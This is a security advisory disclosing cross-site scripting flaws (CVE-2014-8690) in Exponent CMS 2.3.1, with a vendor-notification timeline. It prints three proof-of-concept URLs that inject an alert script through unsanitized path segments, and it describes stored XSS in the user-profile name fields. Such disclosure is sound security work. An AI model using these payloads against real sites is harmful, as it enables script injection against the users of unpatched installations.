######################
# Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies
# Discovered by-
# Mayuresh Dani (mdani@qualys.com)
# Narendra Shinde (nshinde@qualys.com)
# Vendor Homepage: http://www.exponentcms.org/
# Software Link:
http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download
# Version: 2.3.1
# Date: 2014-10-11
# Tested on: Windows 7 / Mozilla Firefox
# Ubuntu 14.04 / Mozilla Firefox
# CVE: CVE-2014-8690
######################
# Vulnerability Disclosure Timeline:
# 2014-11-04: Discovered vulnerability
# 2014-11-04: Vendor Notification
# 2014-11-05: Vendor confirmation
# 2014-11-06: Vendor fixes Universal XSS -
http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0
# 2015-02-12: Public Disclosure
######################
# Description
# Exponent CMS is a free, open source, open standards modular enterprise
software framework and content management system (CMS) written in the PHP.
#
# CVE-2014-8690:
# Universal XSS - Exponent CMS builds the canonical path field from an
unsanitized URL, which can be used to execute arbitrary scripts.
# Examples:
#
http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c
#
http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
#
# 2.b. XSS in user profiles.
# The "First Name" and "Last Name" fields on
http://server/exponent/users/edituser are not sufficiently sanitized. Enter
your favourite script and the application will execute it everytime for you.
#
# More information and PoCs -
http://exponentcms.lightfhouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
#
#
# Thanks,
# Mayuresh & Narendra